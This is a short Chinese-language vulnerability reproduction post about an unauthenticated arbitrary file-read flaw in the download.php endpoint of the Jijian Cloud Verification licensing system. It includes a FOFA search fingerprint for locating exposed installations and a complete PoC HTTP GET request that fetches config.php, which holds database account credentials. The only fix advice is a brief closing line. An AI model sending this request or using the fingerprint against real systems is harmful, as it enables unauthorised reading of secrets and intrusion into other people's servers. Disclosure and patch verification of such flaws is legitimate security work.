极简云验证 download.php 文件读取漏洞复现

0x01 产品简介

极简云验证是一款开源的网络验证系统，支持多应用卡密生成：卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等；支持多应用多用户管理：应用备注 应用版本 多级代理价格 免费付费切换 验证用户IP 验证用户设备 应用开关等

0x02 漏洞概述

极简云验证 download.php 接口处存在文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，数据库账号密码等敏感信息，使系统处于极不安全的状态。

0x03 复现环境

FOFA： "../assets/img/bg/logo_white.png"

0x04 漏洞复现

PoC

GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本